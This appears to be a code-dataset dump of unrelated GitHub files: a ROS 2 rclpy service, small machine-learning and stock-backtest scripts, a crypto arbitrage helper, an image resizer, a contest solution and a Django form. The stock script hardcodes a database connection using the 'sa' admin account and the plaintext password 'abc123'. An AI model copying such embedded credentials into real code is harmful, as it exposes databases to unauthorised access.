node.has_parameter(START_TYPE_DESCRIPTION_SERVICE_PARAM):\n descriptor = ParameterDescriptor(\n name=START_TYPE_DESCRIPTION_SERVICE_PARAM,\n type=ParameterType.PARAMETER_BOOL,\n description='If enabled, start the ~/get_type_description service.',\n read_only=True)\n node.declare_parameter(\n START_TYPE_DESCRIPTION_SERVICE_PARAM,\n True,\n descriptor)\n param = node.get_parameter(START_TYPE_DESCRIPTION_SERVICE_PARAM)\n if param.type_ != Parameter.Type.NOT_SET:\n if param.type_ == Parameter.Type.BOOL:\n self.enabled = param.value\n else:\n node.get_logger().error(\n \"Invalid type for parameter '{}' {!r} should be bool\"\n .format(START_TYPE_DESCRIPTION_SERVICE_PARAM, param.type_))\n else:\n node.get_logger().debug(\n 'Parameter {} not set, defaulting to true.'\n .format(START_TYPE_DESCRIPTION_SERVICE_PARAM))\n\n if self.enabled:\n self._start_service()\n\n def destroy(self):\n # Required manual destruction because this is not managed by rclpy.Service\n if self._type_description_srv is not None:\n self._type_description_srv.destroy_when_not_in_use()\n self._type_description_srv = None\n\n def _start_service(self):\n node = self._get_node()\n self._type_description_srv = _rclpy.TypeDescriptionService(node.handle)\n # Because we are creating our own service wrapper, must manually add the service\n # to the appropriate parts of Node because we cannot call create_service.\n check_is_valid_srv_type(GetTypeDescription)\n service = Service(\n service_impl=self._type_description_srv.impl,\n srv_type=GetTypeDescription,\n srv_name=self.service_name,\n callback=self._service_callback,\n callback_group=node.default_callback_group,\n qos_profile=qos_profile_services_default)\n node.default_callback_group.add_entity(service)\n node._services.append(service)\n node._wake_executor()\n\n def _service_callback(self, request, response):\n return self._type_description_srv.handle_request(\n request, GetTypeDescription.Response, self._get_node().handle)\n\n def _get_node(self):\n node = self._node_weak_ref()\n if node is None:\n raise ReferenceError('Expected valid node weak reference')\n return node\n","repo_name":"ros2/rclpy","sub_path":"rclpy/rclpy/type_description_service.py","file_name":"type_description_service.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"31"} +{"seq_id":"10794101718","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import cross_validation as cv\n\ndata = pd.read_csv('seeds_dataset.txt', delimiter = '\\t')\n\ndata.columns = ['1', '2', '3', '4', '5', '6', '7', '8']\n\nlabels = data['8']\ndimensions = data.ix[:,['1', '2', '3', '4', '5', '6', '7']]\n\ndef distance(p1,p2):\n return np.sum((p2-p1)**2)\n\ndef model(dimensions, labels, new_example):\n comp = []\n pred = []\n\n for e in range(len(new_example)):\n for i in range(len(dimensions)):\n comp.append(distance(dimensions[i], new_example[e]))\n \n smallest = (np.array(comp)).argmin()\n\n pred.append(labels[smallest])\n\n comp = []\n\n return pred\n\ndef folds(labels, dimensions):\n #stratified k-folds CV\n skf = cv.StratifiedKFold(labels, n_folds=10, shuffle = True)\n score = []\n \n for train_index, test_index in skf:\n X_train, X_test = dimensions.ix[train_index], dimensions.ix[test_index]\n Y_train, Y_test = labels.ix[train_index], labels.ix[test_index]\n X_train, X_test = X_train.as_matrix(), X_test.as_matrix()\n Y_train, Y_test = Y_train.as_matrix(), Y_test.as_matrix()\n \n prediction = model(X_train, Y_train, X_test)\n\n result = [prediction==Y_test]\n\n score.append(np.sum(result) / len(Y_test))\n\n score = np.array(score)\n\n print (score)\n\n print (np.mean(score))\n \ndef main():\n folds(labels, dimensions)\n \n \n","repo_name":"GiXxXx/Machine-Learning-Study","sub_path":"Ch2 Nearest Neighbor Classification with Statified KFold CV.py","file_name":"Ch2 Nearest Neighbor Classification with Statified KFold CV.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29728016588","text":"\"\"\" Data organization \"\"\"\nimport cryp_api\nimport bitt_api\nimport polo_api\nimport jeol\n\nimport re\nfrom operator import itemgetter\n\n\"\"\" Returns\n exc = 'polo', 'bitt', 'cryp' => Exchange\n legend = ex: 'BTC!ETH' => Pair in our convention\n depth = ex: 5 => Depth in the orders book to check\n order_type = 'Bid', 'Ask' => type of order to check\n\"\"\"\ndef generic_get_order_book(exc, legend, depth, order_type, inverted):\n if exc == 'polo':\n order_book = polo_api.get_order_book(legend, depth, inverted)\n if exc == 'bitt':\n order_book = bitt_api.get_order_book(legend, depth, inverted)\n if exc == 'cryp':\n order_book = cryp_api.get_order_book(legend, depth, inverted)\n if inverted:\n if order_type == 'Bid':\n order_type = 'Ask'\n else:\n if order_type == 'Ask':\n order_type = 'Bid'\n gen_order_book = [order_book['currency'], order_book[order_type]]\n return gen_order_book\n\n\"\"\" Returns a dict with opportunities between 2 exchanges\n Input is output of api.get_data()\n\"\"\"\ndef compare_exc(exc1, exc2):\n depth = 10\n equiv_pairs = {}\n orders = {}\n for exc1_key in exc1.keys():\n if exc1_key != 'Exchange':\n split1 = sorted(re.split('-|_|/', exc1_key))\n legend1 = split1[0] + '!' + split1[1]\n for exc2_key in exc2.keys():\n if exc2_key != 'Exchange':\n split2 = sorted(re.split('-|_|/', exc2_key))\n legend2 = split2[0] + '!' + split2[1]\n if legend1 == legend2:\n exc1_base = exc1[exc1_key][0]\n exc1_bid = exc1[exc1_key][2]\n exc1_ask = exc1[exc1_key][3]\n exc2_base = exc2[exc2_key][0]\n inverted = False\n if exc1_base == exc2_base:\n exc2_bid = exc2[exc2_key][2]\n exc2_ask = exc2[exc2_key][3]\n else:\n exc2_bid = (1 / exc2[exc2_key][3])\n exc2_ask = (1 / exc2[exc2_key][2])\n inverted = True\n if opp_check(exc1['Exchange'], exc2['Exchange'], exc1_bid, exc2_ask):\n equiv_pairs[legend1] = [exc1['Exchange'], exc2['Exchange'], False, inverted, exc1_key, exc2_key]\n else:\n if opp_check(exc2['Exchange'], exc1['Exchange'], exc2_bid, exc1_ask):\n equiv_pairs[legend2] = [exc2['Exchange'], exc1['Exchange'], inverted, False, exc2_key, exc1_key]\n\n for legend in equiv_pairs.keys():\n bid_exchange = equiv_pairs[legend][0]\n ask_exchange = equiv_pairs[legend][1]\n bid_inverted = equiv_pairs[legend][2]\n ask_inverted = equiv_pairs[legend][3]\n bid_pair = equiv_pairs[legend][4]\n ask_pair = equiv_pairs[legend][5]\n order_book = generic_get_order_book(bid_exchange, legend, depth, 'Bid', bid_inverted)\n bid = order_book[1]\n if len(bid) == 0:\n continue\n # print(\"%s: %s\" % (equiv_pairs[legend][0], order_book[0]))\n order_book = generic_get_order_book(ask_exchange, legend, depth, 'Ask', ask_inverted)\n ask = order_book[1]\n if len(ask) == 0:\n continue\n # print(\"%s: %s\" % (equiv_pairs[legend][1], order_book[0]))\n bid.sort(key=itemgetter(0), reverse=True)\n ask.sort(key=itemgetter(0), reverse=False)\n currency = order_book[0]\n orders[legend] = [bid, ask, currency, bid_inverted, ask_inverted, bid_pair, ask_pair, bid_exchange, ask_exchange]\n\n return orders\n\n\n\"\"\" Compare analysis\n\n\"\"\"\ndef create_orders(compare, considered_pairs):\n orders = {}\n for legend in compare.keys():\n if legend in considered_pairs:\n bid_list = compare[legend][0]\n ask_list = compare[legend][1]\n currency = compare[legend][2]\n bid_inverted = compare[legend][3]\n ask_inverted = compare[legend][4]\n bid_pair = compare[legend][5]\n ask_pair = compare[legend][6]\n bid_exchange = compare[legend][7]\n ask_exchange = compare[legend][8]\n i = 0\n j = 0\n order_vol = 0.0\n order_bid = 0.0\n order_ask = 0.0\n still_running = True\n while still_running:\n bid = bid_list[i]\n bid_price = bid[0]\n bid_vol = bid[1]\n ask = ask_list[j]\n ask_price = ask[0]\n ask_vol = ask[1]\n if opp_check(bid_exchange, ask_exchange, bid_price, ask_price):\n vol = min(bid_vol, ask_vol)\n if order_bid == 0.0:\n order_bid = bid_price\n else:\n order_bid = min(order_bid, bid_price)\n if order_ask == 0.0:\n order_ask = ask_price\n else:\n order_ask = max(order_ask, ask_price)\n order_vol += vol\n print('Order Bid: %.8f, Order Ask: %.8f, Order Vol: %.8f' % (order_bid, order_ask, order_vol))\n bid_list[i][1] -= vol\n ask_list[j][1] -= vol\n if bid_list[i][1] <= 0:\n if i == (len(bid_list) - 1):\n still_running = False\n else:\n i += 1\n else:\n if j == (len(bid_list) - 1):\n still_running = False\n else:\n j += 1\n else:\n still_running = False\n orders[legend] = [bid_exchange, bid_pair, order_bid, bid_inverted, ask_exchange, ask_pair, order_ask, ask_inverted, order_vol]\n return orders\n\n\n\n\n\"\"\" Profit calculation\n\n\"\"\"\ndef profit_calc(orders):\n total_profit = {}\n for legend in orders.keys():\n profit = 0.0\n i = 0\n j = 0\n # print('Legend: ' + legend)\n not_max_profit = True\n bid_list = orders[legend][0]\n ask_list = orders[legend][1]\n currency = orders[legend][2]\n # print('Bid List: ' + str(bid_list))\n # print('Ask List: ' + str(ask_list))\n # print('Currency: ' + currency)\n while not_max_profit:\n # print('Bid i: %d Ask j: %d' % (i, j))\n bid = bid_list[i]\n bid_price = bid[0]\n bid_vol = bid[1]\n # print('Bid: ' + str(bid))\n ask = ask_list[j]\n ask_price = ask[0]\n ask_vol = ask[1]\n # print('Ask: ' + str(ask))\n # print('%.8f > %.8f' % (bid_price, ask_price))\n if bid_price > ask_price:\n order_vol = min(bid_vol, ask_vol)\n # print('Order Vol: %.8f' % order_vol)\n # old_profit = profit\n # print('Profit: %.8f' % old_profit)\n profit += order_vol * (bid_price - ask_price)\n # print('Added: %.8f' % (profit - old_profit))\n bid_list[i][1] -= order_vol\n ask_list[j][1] -= order_vol\n # print('Bid List Updated: ' + str(bid_list[i][1]))\n # print('Ask List Updated: ' + str(ask_list[j][1]))\n if bid_list[i][1] <= 0:\n if i == (len(bid_list) - 1):\n not_max_profit = False\n else:\n i += 1\n else:\n if j == (len(ask_list) - 1):\n not_max_profit = False\n else:\n j += 1\n else:\n not_max_profit = False\n total_profit[legend] = [profit, currency]\n return total_profit\n\n\n\"\"\" Opportunity check\n\n\"\"\"\ndef opp_check(exc_bid, exc_ask, bid, ask):\n if exc_bid == 'polo' or exc_bid == 'cryp':\n fee_exc_bid = 0.002\n else:\n if exc_bid == 'bitt':\n fee_exc_bid = 0.0025\n if exc_ask == 'polo' or exc_ask == 'cryp':\n fee_exc_ask = 0.002\n else:\n if exc_ask == 'bitt':\n fee_exc_ask = 0.0025\n bid = bid / (1 + fee_exc_bid)\n ask = ask / (1 - fee_exc_ask)\n if bid > ask:\n return True\n else:\n return False\n\n\ndef create_considered_list(currencies):\n considered_pairs = []\n for i in range(len(currencies)):\n for j in range((i + 1), len(currencies)):\n considered_pairs.append(currencies[i] + '!' + currencies[j])\n considered_pairs.append(currencies[j] + '!' + currencies[i])\n return considered_pairs\n\n\ndef get_balances(orders):\n balances = {}\n for pair in orders.keys():\n balance = {}\n split_pair1 = pair.split('!')[0]\n split_pair2 = pair.split('!')[1]\n bid_exchange = orders[pair][0]\n ask_exchange = orders[pair][4]\n # print(pair, split_pair1, split_pair2, bid_exchange, ask_exchange)\n if bid_exchange == 'polo' or ask_exchange == 'polo':\n polo = polo_api.Polo(jeol.polo_1(), jeol.polo_2())\n balance1 = polo.return_balance(split_pair1)\n balance2 = polo.return_balance(split_pair2)\n balance['polo'] = [balance1, split_pair1, balance2, split_pair2]\n if bid_exchange == 'bitt' or ask_exchange == 'bitt':\n bitt = bitt_api.Bitt(jeol.bitt_1(), jeol.bitt_2())\n balance1 = bitt.return_balance(split_pair1)\n balance2 = bitt.return_balance(split_pair2)\n balance['bitt'] = [balance1, split_pair1, balance2, split_pair2]\n if bid_exchange == 'cryp' or ask_exchange == 'cryp':\n cryp = cryp_api.Cryp(jeol.cryp_1(), jeol.cryp_2())\n balance1 = cryp.return_balance(split_pair1)\n balance2 = cryp.return_balance(split_pair2)\n balance['cryp'] = [balance1, split_pair1, balance2, split_pair2]\n balances[pair] = balance\n return balances\n\n\ndef check_balances(balances, orders):\n return_bal = {}\n for pair in orders.keys():\n bid_exchange = orders[pair][0]\n bid_pair = orders[pair][1]\n bid_split_pair = re.split('-|_|/', bid_pair)\n bid_price = orders[pair][2]\n if bid_price <= 0:\n continue\n bid_inverted = orders[pair][3]\n ask_exchange = orders[pair][4]\n ask_pair = orders[pair][5]\n ask_split_pair = re.split('-|_|/', ask_pair)\n ask_price = orders[pair][6]\n if ask_price <= 0:\n continue\n ask_inverted = orders[pair][7]\n order_vol = orders[pair][8]\n bid_total = (1 / bid_price) * order_vol\n ask_total = ask_price * order_vol\n if bid_exchange == 'cryp':\n if bid_inverted:\n bid_curr = bid_split_pair[1]\n else:\n bid_curr = bid_split_pair[0]\n else:\n if bid_inverted:\n bid_curr = bid_split_pair[0]\n else:\n bid_curr = bid_split_pair[1]\n if ask_exchange == 'cryp':\n if ask_inverted:\n ask_curr = ask_split_pair[0]\n else:\n ask_curr = ask_split_pair[1]\n else:\n if ask_inverted:\n ask_curr = ask_split_pair[1]\n else:\n ask_curr = ask_split_pair[0]\n if balances[pair][bid_exchange][1] == bid_curr:\n bid_balance = balances[pair][bid_exchange][0]\n else:\n if balances[pair][bid_exchange][3] == bid_curr:\n bid_balance = balances[pair][bid_exchange][2]\n if balances[pair][ask_exchange][1] == ask_curr:\n ask_balance = balances[pair][ask_exchange][0]\n else:\n if balances[pair][ask_exchange][3] == ask_curr:\n ask_balance = balances[pair][ask_exchange][2]\n # print(type(bid_balance), type(ask_balance))\n print('Bid balance: %.8f %s, Ask balance: %.8f %s' % (bid_balance, bid_curr, ask_balance, ask_curr))\n print('Bid total: %.8f %s, Ask total: %.8f %s' % (bid_total, bid_curr, ask_total, ask_curr))\n\n if bid_balance > bid_total and ask_balance > ask_total:\n return_bal[pair] = orders[pair]\n # return_bal[pair] = [bid_balance, bid_curr, ask_balance, ask_curr]\n return return_bal\n\n\n# def execute_orders(orders):\n# for pair in orders.keys():\n# bid_exchange = orders[pair][0]\n# bid_pair = orders[pair][1]\n# bid_price = orders[pair][2]\n# bid_inverted = orders[pair][3]\n# ask_exchange = orders[pair][4]\n# ask_pair = orders[pair][5]\n# ask_price = orders[pair][6]\n# ask_inverted = orders[pair][7]\n# order_vol = orders[pair][8]\n# polo = polo_api.Polo(jeol.polo_1(), jeol.polo_2())\n\n# if bid_exchange == 'polo':\n# if not bid_inverted:\n# polo.return_balance('BTC')\n\n\n","repo_name":"arashi17/python-polo","sub_path":"python/org_data.py","file_name":"org_data.py","file_ext":"py","file_size_in_byte":11318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71255614168","text":"import os\nimport argparse\nfrom PIL import Image, ImageOps, UnidentifiedImageError\n\nclass BulkImageProcessor: \n def __init__(self, paths) -> None:\n '''Takes in list of file path and/or directories. Process any images within them'''\n self.images = []\n for path in paths:\n if os.path.isfile(path):\n try:\n self.images.append(Image.open(path))\n except UnidentifiedImageError as e:\n print(f\"{path} is not an image file, skipping\")\n elif os.path.isdir(path):\n for filename in os.listdir(path):\n filepath = os.path.join(path, filename)\n if os.path.isfile(filepath):\n try:\n self.images.append(Image.open(filepath))\n except UnidentifiedImageError as e:\n print(f\"{filepath} is not an image file, skipping\")\n\n\n def resize(self, size):\n for i, image in enumerate(self.images):\n image = image.resize(size)\n self.images[i] = image\n\n\n def save(self, prefix, output_dir=None):\n if not output_dir:\n output_dir = \"output\"\n i = 0\n while os.path.exists(f\"{output_dir}-{i}\"):\n i += 1\n output_dir = f\"{output_dir}-{i}\"\n os.makedirs(output_dir)\n for i, image in enumerate(self.images):\n image_path = os.path.join(output_dir, f'{prefix}-{i}.png')\n if os.path.exists(image_path):\n raise Exception(f'File {image_path} already exists, will not overwrite')\n image.save(image_path)\n\n\n def colorize(self, rgb_color):\n colorized_images = []\n for img in self.images:\n grayscale_image = ImageOps.grayscale(img)\n color = rgb_color\n print(rgb_color)\n colorized_image = ImageOps.colorize(grayscale_image, black=\"black\", white=\"white\", mid=color)\n colorized_images.append(colorized_image)\n self.images = colorized_images\n\n def to_grayscale(self):\n grayscale_images = []\n for img in self.images:\n grayscale_image = ImageOps.grayscale(img)\n grayscale_images.append(grayscale_image)\n self.images = grayscale_images\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Bulk Image Processor\")\n parser.add_argument('file_paths', type=str, nargs='+',\n help='List of file paths to process')\n parser.add_argument('-s', '--size', type=int, nargs=2,\n help='Size to resize images')\n parser.add_argument('-p', '--prefix', type=str,\n help='Prefix for the filename when saving images')\n parser.add_argument('-c', '--color', type=int, nargs=3,\n help='Color for the images to be changed into')\n parser.add_argument('-g', '--grayscale', action='store_true',\n help='Convert images to grayscale')\n\n \n args = parser.parse_args()\n\n bim = BulkImageProcessor(args.file_paths)\n if args.size:\n bim.resize(args.size)\n if args.color:\n bim.colorize(args.color)\n if args.grayscale:\n bim.to_grayscale()\n if args.prefix:\n bim.save(args.prefix)\n\n","repo_name":"C0nsumption/BIM-TheImageMonster","sub_path":"BulkImageProcessor.py","file_name":"BulkImageProcessor.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45107263066","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 28 08:27:12 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nimport pandas as pd\r\nimport numpy as np\r\nimport talib as ta\r\nimport calendar\r\nfrom datetime import timedelta,datetime\r\nimport pymssql\r\nimport seaborn as sns\r\n\r\nconn=pymssql.connect( #connect\r\n\tserver='192.168.0.28',\r\n\tport=1433,\r\n\tuser='sa',\r\n\tpassword='abc123',\r\n\tdatabase='rawdata'\r\n\t)\r\n\r\ndef get_stock_day(stock,start_date,end_date,freq = '1D'):\r\n\r\n SQL_code = \"S_INFO_WINDCODE=\"+\"\\'\"+stock+\"\\'\"\r\n\r\n SQL_date =\"TRADE_DT between \"+\"\\'\"+start_date+\"\\' and \\'\" + end_date+\"\\'\"\r\n\r\n SQL_price = \"select S_DQ_ADJOPEN,S_DQ_ADJHIGH,S_DQ_ADJLOW,S_DQ_ADJCLOSE,S_DQ_VOLUME,TRADE_DT from ASHAREEODPRICES where \"+SQL_code+' and '+SQL_date+' and S_DQ_VOLUME>0'\r\n\r\n price = pd.read_sql(SQL_price,conn,index_col='TRADE_DT')\r\n \r\n return price\r\n\r\ndef get_index_day(index,start_date,end_date,freq = '1D'):\r\n\r\n index_code2,index_code1 = index.split('.')\r\n\r\n SQL_code = \"scode1=\"+\"\\'\"+index_code1+\"\\' and scode2=\\'\"+index_code2+\"\\'\"\r\n\r\n SQL_date =\"ddate between \"+\"\\'\"+start_date+\"\\' and \\'\" + end_date+\"\\'\"\r\n\r\n SQL_price = \"select sclose,sopen,high,low,ddate from indexs_day where \"+SQL_code+' and '+SQL_date\r\n\r\n SQL_vol = \"select volumn,ddate from indexs_day where \"+SQL_code+' and '+SQL_date\r\n\r\n price = pd.read_sql(SQL_price,conn,index_col='ddate')\r\n \r\n close = price.sclose.resample(freq).last().dropna()\r\n \r\n open = price.sopen.resample(freq).first().dropna()\r\n \r\n high = price.high.resample(freq).max().dropna()\r\n \r\n low = price.low.resample(freq).min().dropna()\r\n \r\n vol = pd.read_sql(SQL_vol,conn,index_col='ddate')\r\n\r\n vol = vol.resample(freq).sum().dropna()\r\n \r\n price = pd.concat([close,open,high,low],axis=1)\r\n\r\n data = price.join(vol)\r\n \r\n return data\r\n\r\npool_dic={}\r\nu=set()\r\nuniverse=pd.read_excel('code.xlsx')\r\npool_dic[universe.index[0].strftime('%Y%m')]=universe.ix[0].tolist()\r\nfor i in range(1,len(universe)):\r\n if universe.index[i].month!=universe.index[i-1].month:\r\n pool_dic[universe.index[i].strftime('%Y%m')]=universe.ix[i-1].tolist()\r\n u=u.union(universe.ix[i-1].tolist())\r\nall_stock={}\r\nfor stock in u:\r\n SS=get_stock_day(stock,'2009-01-01','2018-08-01',freq='1D')\r\n \r\n MA = pd.DataFrame()\r\n for i in range(10,90,10):\r\n local_MA = ta.MA(SS.S_DQ_ADJCLOSE,timeperiod = i)\r\n local_MA.name = 'MA'+str(i)\r\n MA = pd.concat([MA,local_MA],axis=1)\r\n \r\n MACD1,MACD2,XX = ta.MACD(SS.S_DQ_ADJCLOSE)\r\n MACD = pd.concat([MACD1,MACD2],axis=1)\r\n ADX = ta.ADX(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n ADXR = ta.ADXR(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n aroondown,aroonup = ta.AROON(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW)\r\n ATR = ta.ATR(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n Bupper,Bmiddle,Blower = ta.BBANDS(SS.S_DQ_ADJCLOSE)\r\n group1 = pd.concat([SS,MA,MACD,ADX,ADXR,aroondown,aroonup,ATR,Bupper,Bmiddle,Blower],axis=1)\r\n \r\n BOP = ta.BOP(SS.S_DQ_ADJOPEN,SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n CCI = ta.CCI(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n CMO = ta.CMO(SS.S_DQ_ADJCLOSE)\r\n DEMA = ta.DEMA(SS.S_DQ_ADJCLOSE)\r\n DX = ta.DX(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n EMA = ta.EMA(SS.S_DQ_ADJCLOSE)\r\n KAMA = ta.KAMA(SS.S_DQ_ADJCLOSE)\r\n MFI = ta.MFI(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE,SS.S_DQ_VOLUME)\r\n MOM = ta.MOM(SS.S_DQ_ADJCLOSE)\r\n RSI = ta.RSI(SS.S_DQ_ADJCLOSE)\r\n group2 = pd.concat([BOP,CCI,CMO,DEMA,DX,EMA,KAMA,MFI,MOM,RSI],axis=1)\r\n \r\n SAR = ta.SAR(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW)\r\n TEMA = ta.TEMA(SS.S_DQ_ADJCLOSE)\r\n TRANGE = ta.TRANGE(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n TRIMA = ta.TRIMA(SS.S_DQ_ADJCLOSE)\r\n TRIX = ta.TRIX(SS.S_DQ_ADJCLOSE)\r\n group3 = pd.concat([SAR,TEMA,TRANGE,TRIMA,TRIX],axis=1)\r\n \r\n raw_ta = pd.concat([group1,group2,group3],axis=1)\r\n raw_ta=raw_ta.dropna()\r\n all_stock[stock]=raw_ta\r\nSS = get_index_day('000001.SH','2009-01-01','2018-08-01',freq='1D')\r\nreturn_rate=[]\r\nfor i in range(len(SS)-22):\r\n return_rate.append((SS.sclose[i+22]-SS.sclose[i])/SS.sclose[i])\r\nreturn_rate=return_rate+[np.nan]*22\r\nSS['return_rate']=return_rate\r\n\r\nstock_all=all_stock.copy()\r\n#stock_all['000001.SH']=SS\r\nfor key, value in stock_all.items():\r\n return_rate=[]\r\n for i in range(len(value)-22):\r\n return_rate.append((value.S_DQ_ADJCLOSE[i+22]-value.S_DQ_ADJCLOSE[i])/value.S_DQ_ADJCLOSE[i])\r\n return_rate=return_rate+[np.nan]*22\r\n value['return_rate_stock']=return_rate\r\n target=SS[['return_rate']].join(value,how='inner')\r\n label=[]\r\n for j in range(len(target)):\r\n if target.return_rate_stock[j]>target.return_rate[j]:\r\n label.append(1)\r\n else:\r\n label.append(0)\r\n value['label']=label\r\n del value['return_rate_stock']\r\n\r\nfor key,value in stock_all.items():\r\n value.index=pd.to_datetime(value.index)\r\n\r\ntrain=pd.DataFrame()\r\nfor key, value in pool_dic.items():\r\n for j in value:\r\n train=train.append(stock_all[j][key[4:]+'/1/'+key[:4]:key[4:]+'/'+str(calendar.monthrange(int(key[:4]),int(key[4:]))[1])+'/'+key[:4]])\r\ntrain=train.sort_index()\r\np={}\r\nfor i in range(len(universe)):\r\n if universe.index[i].month!=universe.index[i-1].month or i==0:\r\n df=pd.DataFrame()\r\n code=[]\r\n for j in pool_dic[universe.index[i].strftime('%Y%m')]:\r\n df=df.append(stock_all[j][universe.index[i].strftime(\"%m/%d/%Y\"):universe.index[i].strftime(\"%m/%d/%Y\")])\r\n if not stock_all[j][universe.index[i].strftime(\"%m/%d/%Y\"):universe.index[i].strftime(\"%m/%d/%Y\")].empty:\r\n code.append(j)\r\n df.index=code \r\n p[universe.index[i].strftime('%Y%m%d')]=df\r\n \r\n\r\ndraw=pd.DataFrame()\r\nhold_all=[]\r\nfor k in range(5):\r\n net_value=1\r\n pnl=[1]\r\n correct1=[]\r\n correct2=[]\r\n ind=[]\r\n hold={}\r\n for day in p.keys():\r\n n=net_value\r\n ind.append(day)\r\n if day!='20100104' and day!='20100201' and net_value>0:\r\n t=train[(pd.to_datetime(day)-timedelta(days=180)).strftime(\"%m/%d/%Y\"):(pd.to_datetime(day)-timedelta(days=35)).strftime(\"%m/%d/%Y\")]\r\n x_train=t.iloc[:,:-1]\r\n y_train=t.iloc[:,-1]\r\n x_predict=p[day].iloc[:,:-1]\r\n real_predict=p[day].iloc[:,-1]\r\n rf = RandomForestClassifier(n_estimators=100,oob_score=True)\r\n rf.fit(x_train,y_train)\r\n correct1.append (rf.score(x_predict, real_predict))\r\n correct2.append (rf.score(x_train, y_train))\r\n y_predict=rf.predict(x_predict)\r\n pos={}\r\n position=[]\r\n for i in range(len(y_predict)):\r\n if y_predict[i]==1:\r\n pos[x_predict.index[i]]=x_predict.S_DQ_ADJCLOSE[i]\r\n position.append(x_predict.index[i])\r\n length=len(pos)\r\n# if length<5:\r\n# pos['000001.SH']=SS.loc[pd.to_datetime(key)].S_DQ_ADJCLOSE\r\n pop_list=[]\r\n hold[day]=position\r\n for key,value in pos.items():\r\n df=stock_all[key][day[4:6]+'/1/'+day[:4]:day[4:6]+'/'+str(calendar.monthrange(int(day[:4]),int(day[4:6]))[1])+'/'+day[:4]]\r\n for j in range(len(df)):\r\n if (df.S_DQ_ADJCLOSE[j]-value)/value<-0.05:\r\n pop_list.append(key)\r\n net_value=net_value+(df.S_DQ_ADJCLOSE[j]-value)*net_value/length/value*1.006\r\n break\r\n if not key in pop_list:\r\n net_value=net_value+(df.S_DQ_ADJCLOSE[-1]-value)*net_value/length/value*0.994\r\n pnl.append(net_value)\r\n hold_all.append(hold)\r\n draw['NetValue'+str(k)]=pnl\r\nind.remove('20100104')\r\ndraw.index=ind\r\nindex=[]\r\nfor day in p.keys():\r\n if day!='20100104' and day!='20100201':\r\n index.append(SS.ix[SS.index.tolist().index(pd.to_datetime(day))-1].sclose/SS.loc[pd.to_datetime('20100301')].sclose)\r\nindex.append(SS.loc[pd.to_datetime('20180629')].sclose/SS.loc[pd.to_datetime('20100301')].sclose)\r\ndraw['index']=index\r\ndraw.plot()\r\n\r\ndf_collect=[]\r\nfor cnt in range(5):\r\n df = pd.DataFrame()\r\n for key,values in hold_all[cnt].items():\r\n local_df = pd.DataFrame(index=[key],data=np.array([values]))\r\n df = pd.concat([df,local_df])\r\n df.to_excel('run'+str(cnt)+'.xlsx')\r\n df_collect.append(df)\r\n \r\ndef overlap(df1,df2):\r\n collect = []\r\n for i in range(len(df1)):\r\n cnt = 0\r\n for j in df1.iloc[i].dropna():\r\n for k in df2.iloc[i].dropna():\r\n if j ==k:\r\n cnt+=1\r\n collect.append(cnt/max(len(df1.iloc[i].dropna()),len(df2.iloc[i].dropna())))\r\n ovp_df = pd.DataFrame(index = df.index,data =collect)\r\n return ovp_df\r\n\r\novp_collect =[]\r\n\r\nfor cnt1 in range(5):\r\n local_ovp_collet=[]\r\n for cnt2 in range(5):\r\n x = overlap(df_collect[cnt1],df_collect[cnt2])\r\n local_ovp_collet.append(x.mean().values[0])\r\n ovp_collect.append(local_ovp_collet)\r\n\r\nsns.heatmap(ovp_collect)\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n#hold_all是每月月初持仓\r\n","repo_name":"ZTang813/ML-Project-StockSelection","sub_path":"rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32370234117","text":"N = int( input() )\nh = list( map( int, input().split() ) )\n\nans = 0\nfor j in reversed( range( 1, 101 ) ):\n flag = False\n for i in range( N ):\n if flag == True and h[ i ] < j:\n ans += 1\n \n if h[ i ] >= j:\n flag = True\n else:\n flag = False\n \n if flag == True:\n ans += 1\n\nprint( ans )","repo_name":"tsukasa2/AtCoder","sub_path":"practice/ABC/116/abc116-c.py","file_name":"abc116-c.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45460013357","text":"from django import forms\nfrom book_store.models import Author\n\nclass AuthorForm(forms.Form):\n image=forms.FileField()\n name=forms.CharField(max_length=50)\n\nclass AuthorFormModel(forms.ModelForm):\n class Meta:\n model = Author\n fields =\"__all__\"\n\n labels={\n 'name':\"Enter Author Name\",\n 'email':'Enter Author Email',\n 'phone':'Enter Author Phone Number',\n 'profile':'Upload Profile Picture'\n 